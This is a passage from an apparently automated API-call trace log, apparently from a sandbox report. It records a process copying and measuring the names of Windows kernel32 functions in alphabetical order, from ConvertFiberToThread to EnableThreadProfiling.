lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.022] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.023] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.023] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.023] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.023] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.023] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.023] lstrlenA (lpString="COPYFILEA") returned 9 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.023] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.023] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.023] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.023] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.023] lstrlenA (lpString="COPYFILEW") returned 9 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.023] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.023] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.023] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.023] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.023] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.023] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.023] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.023] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.024] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.024] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.024] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.024] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.024] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.024] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.024] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.024] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.024] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.024] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.024] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.024] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.024] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.024] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.024] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.024] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.024] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.024] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.024] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.024] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.025] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.025] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.025] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.025] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.025] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.025] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.025] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.025] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.025] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.025] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.025] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.025] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.025] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.025] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.025] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.025] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.025] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.025] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.025] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.026] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.026] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.026] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.026] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.026] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.026] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.026] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.026] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.026] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.026] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.026] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.026] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.026] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.026] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.026] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.026] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.026] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.026] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.026] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.026] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.027] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.027] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.027] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.027] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.027] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.027] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.027] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.027] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.027] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.027] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.027] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.027] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.027] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.027] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.027] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.027] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.027] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.027] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.027] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.027] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.028] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.028] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.028] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.028] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.028] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.028] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.028] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.028] lstrlenA (lpString="DELETEATOM") returned 10 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.028] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.028] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.028] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.028] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.028] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.028] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.028] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.028] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.028] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.028] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.028] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.029] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.029] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.029] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.029] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.029] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.029] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.029] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.029] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.029] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.029] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.029] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.029] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.029] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.029] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.029] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.029] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") 